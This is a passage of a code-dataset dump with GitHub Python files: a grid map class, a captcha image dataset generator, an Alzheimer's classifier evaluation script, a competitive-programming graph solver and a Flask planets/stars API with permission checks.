"line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 562, "usage_type": "attribute"}, {"api_name": "mrcnn.visualize", "line_number": 564, "usage_type": "call"}]}
+{"seq_id": "23709131351", "text": "from random import randint\nfrom enum import Enum\n\nclass MAP_ENTRY_TYPE(Enum): # это перечисление определяет различные типы ячеек, которые могут присутствовать на карте.\n\tMAP_EMPTY = 0,\n\tMAP_BLOCK = 1,\n\tMAP_TARGET = 2,\n\tMAP_PATH = 3,\n\nclass WALL_DIRECTION(Enum): # это перечисление определяет различные направления, в которых может быть обращена стена.\n\tWALL_LEFT = 0,\n\tWALL_UP = 1,\n\tWALL_RIGHT = 2,\n\tWALL_DOWN = 3,\n\t\nmap_entry_types = {0:MAP_ENTRY_TYPE.MAP_EMPTY, 1:MAP_ENTRY_TYPE.MAP_BLOCK, 2:MAP_ENTRY_TYPE.MAP_TARGET, 3:MAP_ENTRY_TYPE.MAP_PATH}\n# сопоставляет целочисленные значения с элементами перечисления MAP_ENTRY_TYPE. \n# Это используется методом getType для преобразования целочисленного значения ячейки в соответствующее значение MAP_ENTRY_TYPE.\nclass Map():\n\tdef __init__(self, width, height): \n\t\tself.width = width\n\t\tself.height = height\n\t\tself.map = [[0 for x in range(self.width)] for y in range(self.height)]\n# конструктор класса Map, который инициализирует ширину и высоту карты и создает пустую двумерную сетку ячеек с указанными размерами.\t\n\tdef generatePos(self, rangeX, rangeY):\n\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\twhile self.map[y][x] == 1:\n\t\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\treturn (x , y)\n# этот метод генерирует случайную позицию (x, y) в пределах указанного диапазона значений x и y. \n# Он продолжает генерировать новые случайные позиции, пока не найдет ту, которая не является заблокированной ячейкой (т. е. ячейкой со значением 1).\t\n\tdef resetMap(self, value):\n\t\tfor y in range(self.height):\n\t\t\tfor x in range(self.width):\n\t\t\t\tself.setMap(x, y, value)\n# этот метод сбрасывает всю карту, устанавливая для всех ячеек указанное значение.\n\tdef setMap(self, x, y, value):\n\t\tif value == MAP_ENTRY_TYPE.MAP_EMPTY:\n\t\t\tself.map[y][x] = 0\n\t\telif value == MAP_ENTRY_TYPE.MAP_BLOCK:\n\t\t\tself.map[y][x] = 1\n\t\telif value == MAP_ENTRY_TYPE.MAP_TARGET:\n\t\t\tself.map[y][x] = 2\n\t\telse:\n\t\t\tself.map[y][x] = 3\n# этот метод устанавливает значение ячейки в позиции (x, y) на указанное значение.\n\tdef isVisited(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не была посещена (т. е. ее значение не равно 1), и False в противном случае.\n\tdef isMovable(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не является заблокированной ячейкой (т. е. 
ее значение не равно 1), и False в противном случае.\t\n# \t\n\tdef isValid(self, x, y):\n\t\tif x < 0 or x >= self.width or y < 0 or y >= self.height:\n\t\t\treturn False\n\t\treturn True\n# этот метод возвращает True, если позиция (x, y) находится в пределах границ карты, и False в противном случае.\t\n\tdef getType(self, x, y):\n\t\treturn map_entry_types[self.map[y][x]]\n# этот метод возвращает тип ячейки в позиции (x, y) как элемент перечисления MAP_ENTRY_TYPE.\n\tdef showMap(self):\n\t\tfor row in self.map:\n\t\t\ts = ''\n\t\t\tfor entry in row:\n\t\t\t\tif entry == 0:\n\t\t\t\t\ts += ' 0'\n\t\t\t\telif entry == 1:\n\t\t\t\t\ts += ' #'\n\t\t\t\telse:\n\t\t\t\t\ts += ' X'\n\t\t\tprint(s)\n# этот метод выводит карту на консоль с заблокированными ячейками, представленными '#', и всеми остальными ячейками, представленными символом пробела.\t", "repo_name": "NikitaBukreyev/algoritms", "sub_path": "lab2/a_star/GameMap.py", "file_name": "GameMap.py", "file_ext": "py", "file_size_in_byte": 4428, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 10, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}]}
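A short usage sketch for the Map class in the record above; the grid size and coordinates are arbitrary, and it assumes GameMap.py is importable from the working directory.

from GameMap import Map, MAP_ENTRY_TYPE

m = Map(5, 5)                              # 5x5 grid, all cells empty (0)
m.setMap(2, 2, MAP_ENTRY_TYPE.MAP_BLOCK)   # wall off the centre cell
print(m.getType(2, 2))                     # MAP_ENTRY_TYPE.MAP_BLOCK
print(m.isMovable(2, 2), m.isValid(9, 0))  # False False
x, y = m.generatePos((0, 4), (0, 4))       # rejection-samples until a non-wall cell
m.showMap()                                # '#' marks the blocked cell

Note that generatePos only terminates if at least one cell in the sampled range is unblocked; on a fully walled region it would loop forever.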
+{"seq_id": "6767056735", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport string\nimport os\nimport shutil\nimport uuid\nfrom captcha.image import ImageCaptcha\nimport codecs\nimport itertools\nimport random\n\nMETA_FILENAME = 'meta.json'\nSTRING_DATA = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nFLAGS = None\n\ndef _gen_captcha(img_dir, n, width, height):\n #print('dir ' + img_dir)\n if os.path.exists(img_dir):\n shutil.rmtree(img_dir)\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n print('n', n)\n font_files = ['63.ttf', '5751.ttf']\n image = ImageCaptcha(width=width, height=height, fonts=font_files)\n\n with open('russian.txt', 'r', encoding='UTF-8') as file:\n file_data = file.read().split('\\n')\n\n for _ in range(n):\n for i in file_data:\n captcha = ''.join(i)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n choices = STRING_DATA\n\n data = list(itertools.permutations(choices, 4))\n print(len(data))\n length = 10\n for _ in range(n):\n for i in range(length):#num_per_image\n x = random.choice(data)\n captcha = ''.join(x)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n\ndef build_file_path(data_dir, npi, n_epoch, x):\n return os.path.join(data_dir, 'char-%s-epoch-%s' % (npi, n_epoch), x)\n\n\ndef gen_dataset(data_dir, n_epoch, npi, test_ratio):\n width = 40 + 20 * npi#40 + x * 20\n height = 100#100\n\n # meta info\n meta = {\n 'num_per_image': npi,\n 'label_size': len(STRING_DATA),\n 'label_choices': STRING_DATA,\n 'n_epoch': n_epoch,\n 'width': width,\n 'height': height,\n }\n #print(meta)\n\n train_path = build_file_path(data_dir, npi, n_epoch, 'train')\n test_path = build_file_path(data_dir, npi, n_epoch, 'test')\n print(train_path, test_path)\n\n _gen_captcha(train_path, n_epoch, width, height)\n _gen_captcha(test_path, max(1, int(n_epoch * test_ratio)), width, height)\n\n meta_filename = build_file_path(data_dir, npi, n_epoch, META_FILENAME)\n\n print(meta)\n with codecs.open(meta_filename, 'w', encoding='UTF-8') as f:\n json.dump(meta, f, indent=4)\n print('write meta info in %s' % meta_filename)\n\n\nif __name__ == '__main__':\n data_dir = 'E:\\\\Python\\\\captcha-tensorflow\\\\datasets\\\\images'\n n_epoch = 2\n nip = 4\n ratio = 0.2\n\n gen_dataset(data_dir, n_epoch, nip, ratio)\n", "repo_name": "bakaInc/3d_catpcha_solve", "sub_path": "datasets/gen_captcha.py", "file_name": "gen_captcha.py", "file_ext": "py", "file_size_in_byte": 2528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "captcha.image.ImageCaptcha", "line_number": 27, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 35, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "captcha.image", 
"line_number": 36, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 47, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "20270456033", "text": "import numpy as np\r\nimport os\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n#In[1]:\r\n\r\n# - import test arrays (select path)\r\nX_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_image_emci.npy\")\r\ny_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_label_emci.npy\")\r\n\r\nprint (\"Dados de teste:\", len(X_test))\r\n\r\n\r\n#In[2]:\r\ntest_image = X_test\r\ntest_label = y_test\r\nprint(test_image.shape)\r\n\r\n\r\n#In[3]:\r\nbatch_size = 3\r\ntest_loader = tf.data.Dataset.from_tensor_slices((X_test, y_test))\r\n\r\ndef test_preprocessing(volume, label):\r\n \"\"\"Process test data by only adding a channel and covert to rgb.\"\"\"\r\n volume = tf.expand_dims(volume, axis=3)\r\n volume=tf.image.grayscale_to_rgb(volume)\r\n return volume, label\r\n\r\n# - do not shuffle the test dataset \r\ntest_dataset = (\r\n test_loader.map(test_preprocessing)\r\n .batch(batch_size)\r\n .prefetch(2)\r\n)\r\n\r\n#In[4]:\r\n\r\n\r\n# - import the trained model\r\nfinal_model = keras.models.load_model('/content/drive/MyDrive/TESE/Final_class/seresnet152_final_emci.h5')\r\n\r\nfinal_model.evaluate(test_dataset)\r\nfinal_predict = final_model.predict(test_dataset)\r\n\r\nprint(final_predict)\r\n\r\npredict = (final_predict > 0.5).astype('int')\r\n\r\nprint(predict)\r\nprint(test_label)\r\n\r\n# - create an array with the desired labels \r\nlabels_multi=np.array([\"CN\", \"EMCI\", \"LMCI\", \"AD\"])\r\nlabels_bi=np.array([\"CN\", \"AD\"])\r\n\r\n#In[5]:\r\nfrom sklearn.metrics import accuracy_score, ConfusionMatrixDisplay, classification_report, roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\n\r\n#MULTICLASS\r\nConfusionMatrixDisplay.from_predictions(test_label.argmax(axis=1), predict.argmax(axis=1), display_labels=labels_multi, cmap=plt.cm.Blues)\r\n\r\n#BINARYCLASS\r\nConfusionMatrixDisplay.from_predictions(test_label, predict,display_labels=labels_bi, cmap=plt.cm.Blues)\r\n\r\n\r\n\r\n#In[6]:\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_roc_curve(true_y, y_prob):\r\n\r\n fpr, tpr, thresholds = roc_curve(true_y, y_prob)\r\n plt.plot(fpr, tpr, label='Model')\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n\r\nplot_roc_curve(test_label, final_predict)\r\nprint(f'Model AUC score: {roc_auc_score(test_label, final_predict)}')\r\n\r\n\r\n\r\n\r\n#In[7]:\r\n\r\nhistory = pd.read_csv('/content/drive/MyDrive/TESE/Final_class/seresnet152_lmci___.csv')\r\nprint(history)\r\n\r\n\r\n#In[8]:\r\n\r\n# - Loss plot\r\nplt.plot(history['loss'], label= 'Training Loss')\r\nplt.plot(history['val_loss'], label= 'Validation Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\n# - Accuracy plot\r\nplt.plot(history['binary_accuracy'], label= 'Training Accuracy')\r\nplt.plot(history['val_binary_accuracy'], label= 'Validation Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#In[9]:\r\n\r\n#MULTICLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'EMCI', 'LMCI','AD']))\r\n\r\n#BINARYCLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'AD']))\r\n\r\n", "repo_name": "MarianaCoelho9/Alzheimer-Detection", "sub_path": "Test_model.py", "file_name": "Test_model.py", "file_ext": "py", 
"file_size_in_byte": 3137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.load", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.grayscale_to_rgb", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "31635186798", "text": "# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\nn,m = map(int,readline().split())\nab = list(map(int,read().split()))\n\n####################\nimport sys\nsys.setrecursionlimit(10**6)\n\nclass UnionFind():\n def __init__(self, n):\n self.n = n\n self.parents = [-1] * n\n\n def find(self,x):\n if(self.parents[x] < 0):\n return x\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n\n def size(self, x):\n return self.parents[ self.find(x) ] * -1\n\n def same(self, x, y):\n x_root = self.find(x)\n y_root = self.find(y)\n return (x_root == y_root)\n\n def union(self,x,y):\n x_root = self.find(x)\n y_root = self.find(y)\n if(x_root == y_root):\n return\n\n if( self.parents[x_root] <= self.parents[y_root] ):\n self.parents[x_root] += self.parents[y_root]\n self.parents[y_root] = x_root\n else:\n self.parents[y_root] += self.parents[x_root]\n self.parents[x_root] = y_root\n\n def members(self,x):\n root = self.find(x)\n ret = [ i for i in range(self.n) if self.find(i) == root ]\n return ret\n\n def roots(self):\n ret = [ i for i in range(self.n) if self.parents[i] < 0]\n return ret\n\n def group_count(self):\n return len(self.roots())\n\n def all_group_members(self):\n return {r: self.members(r) for r in self.roots()}\n\nimport random\n\nn = 10\nremains = [set(range(n)) for _ in range(n)]\nuf = UnionFind(n)\nedges = set()\nwhile(uf.size(0) < n):\n i = random.randint(0,n-1)\n # print(i)\n if(not remains[i]):\n continue\n js = list(remains[i])\n j = random.choice(js)\n # print(i,j)\n remains[i].remove(j)\n if(i==j):\n continue\n remains[j].remove(i)\n\n edges.add((i+1,j+1))\n uf.union(i,j)\n # print('add')\n # print(uf.parents)\n\n# print(edges)\n# print(len(edges))\n\nm = len(edges)\nab = []\nfor i,j in edges:\n ab.append(i)\n ab.append(j)\n\nprint(ab)\nprint(n,m)\n\n#####################\n\nif(m%2==1):\n print(-1)\n exit()\n\nit = iter(ab)\nlinks = [[] for _ in range(n+1)]\nfor a,b in zip(it,it):\n links[a].append(b)\n links[b].append(a)\n\nfor i,l in enumerate(links):\n print(i,l)\n\ndepth = [-1] * (n+1)\nparent = [0] * (n+1)\nchild = [set() for _ in range(n+1)]\nhq_dep = []\nd = defaultdict(int)\n\nstack = [1]\ndepth[1] = 0\nheappush(hq_dep, (0,1))\nnow_dep = 1\nwhile(stack):\n stack2 = []\n while(stack):\n i = stack.pop()\n for j in links[i]:\n if(depth[j] == -1):\n depth[j] = now_dep\n parent[j] = i\n d[i*10**6+j] = 1\n heappush(hq_dep,(now_dep*-1,j))\n stack2.append(j)\n else:\n child[j].add(i)\n now_dep += 1\n stack = stack2[::]\n\n# print(parent)\n# print(child)\n# print(d)\n# print(hq_dep)\n\nans = []\nfor _ in range(m//2):\n while(True):\n i_dep,i= hq_dep[0]\n if(parent[i]==0):\n heappop(hq_dep)\n else:\n break\n\n if(child[i]):\n j = child[i].pop()\n if(child[i]):\n k = child[i].pop()\n else:\n k = parent[i]\n parent[i] = 0\n\n if(parent[j]==i):\n parent[j] = 0\n else:\n child[j].remove(i)\n if(parent[k]==i):\n parent[k] = 0\n else:\n child[k].remove(i)\n\n ans.append((i,j))\n ans.append((i,k))\n\n\n else:\n j = parent[i]\n 
child[j].remove(i)\n            heappop(hq_dep)\n            if(child[j]):\n                k = child[j].pop()\n            else:\n                k = parent[j]\n                parent[j] = 0\n            if(parent[k]==j):\n                parent[k] = 0\n            else:\n                print(k,j)\n                print(parent)\n                print(child)\n                child[k].remove(j)\n\n            ans.append((j,i))\n            ans.append((j,k))\n\n\nprint('\\n'.join(map(lambda x: ' '.join(map(str,x)), ans)))\n\n\n\n\n'''\nDeciding from the endpoints should settle everything?\n\nWhat to do about cycles?\nThings like K5.\n\nHandle the cycles first?\n\nPaths of even length can be processed.\n\nDoes it need to be a bipartite graph?\n-> No\n\n\nOnce one edge is used, one more edge has to be used with it.\n\nRemove 2 edges; if we can keep going, OK?\n\nA tree with an odd number of vertices works\n\n\nIs there a graph that fails even though trees work?\n-> It is fine as long as edges can be removed while keeping the whole graph connected\n\nFix a root in advance and process from the farthest vertices?\n\nKeep a heapq of vertex depths\nTake the deepest vertex.\nIf it is not a leaf, take 2 edges.\n\nIf it is a leaf, take 1 edge and move to the vertex it leads to, or to the deepest one\n\nRepeating this should be OK?\n\n'''\n", "repo_name": "komajun365/competitive_programming", "sub_path": "agc/agc035_old/b2.py", "file_name": "b2.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.setrecursionlimit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 137, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 148, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 165, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 193, "usage_type": "call"}]}
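As an aside to the generator in the record above, which keeps adding random edges until uf.size(0) reaches n, this compact re-statement shows the same trick with a minimal union-find: stop once vertex 0's component spans all n vertices. Function and variable names here are illustrative, not from the record.

import random

def random_connected_edges(n, seed=0):
    rng = random.Random(seed)
    parent = list(range(n))

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    edges, components = set(), n
    while components > 1:                   # connected iff one component remains
        i, j = rng.randrange(n), rng.randrange(n)
        if i == j or (i, j) in edges or (j, i) in edges:
            continue                        # skip self-loops and duplicate edges
        edges.add((i, j))
        ri, rj = find(i), find(j)
        if ri != rj:
            parent[ri] = rj
            components -= 1
    return sorted(edges)

print(random_connected_edges(6))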
+{"seq_id": "10657536490", "text": "import os\nimport sys\nfrom models import db, setup_db, Planets, Stars\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n setup_db(app)\n CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, POST, PATCH, DELETE, OPTIONS')\n return response\n\n @app.route(\"/\")\n def index():\n return jsonify({\"status\": \"Hey I'm working\"})\n\n '''planets'''\n\n @app.route(\"/planets\")\n @requires_auth('get:planets')\n def get_planets(payload):\n error = False\n try:\n get_planets = Planets.query.all()\n planets = []\n for planet in get_planets:\n planets.append({\n 'id': planet.id,\n 'name': planet.name,\n 'moons_number': planet.moons_number\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'planets': planets\n })\n\n @app.route(\"/planets\", methods=[\"POST\"])\n @requires_auth('post:planets')\n def add_planet(payload):\n error = False\n try:\n name = request.get_json()['name']\n moons_number = request.get_json()['moonsNumber']\n add = Planets(\n name=name,\n moons_number=moons_number\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'moons_number': moons_number\n })\n\n @app.route('/planets/', methods=['DELETE'])\n @requires_auth('delete:planets')\n def del_planets(payload, planet_id):\n error = False\n try:\n planets = Planets.query.filter_by(id=planet_id).first()\n planets.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/planets/', methods=[\"PATCH\"])\n @requires_auth('patch:planets')\n def patch_planets(payload, planet_id):\n error = False\n get_planets = Planets.query.filter_by(id=planet_id).first()\n try:\n name = request.get_json()[\"name\"]\n moons_number = request.get_json()[\"moonsNumber\"]\n get_planets.name = name\n get_planets.moons_number = moons_number\n get_planets.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n '''stars'''\n\n @app.route(\"/stars\")\n @requires_auth('get:stars')\n def stars(payload):\n error = False\n try:\n get_stars = Stars.query.all()\n stars = []\n for star in get_stars:\n stars.append({\n 'id': star.id,\n 'name': star.name,\n 'age': star.age\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'stars': stars})\n\n @app.route(\"/stars\", methods=[\"POST\"])\n @requires_auth('post:stars')\n def add_stars(payload):\n error = False\n try:\n name = request.get_json()['name']\n age = request.get_json()['age']\n add = Stars(\n name=name,\n age=age\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'age': age\n })\n\n @app.route('/stars/', methods=['DELETE'])\n @requires_auth('delete:stars')\n def del_stars(payload, star_id):\n error = False\n stars = Stars.query.filter_by(id=star_id).first()\n try:\n stars.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n 
})\n\n @app.route('/stars/', methods=['PATCH'])\n @requires_auth('patch:stars')\n def patch_stars(payload, star_id):\n error = False\n try:\n get_stars = Stars.query.filter_by(id=star_id).first()\n name = request.get_json()[\"name\"]\n age = request.get_json()[\"age\"]\n get_stars.name = name\n get_stars.age = age\n get_stars.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(500)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \" Internal Server Error\"\n }), 500\n\n @app.errorhandler(AuthError)\n def auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n return app\n\n\napp = create_app()\n", "repo_name": "shaimaaseyam/capastone", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "models.setup_db", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Planets.query.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Planets", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 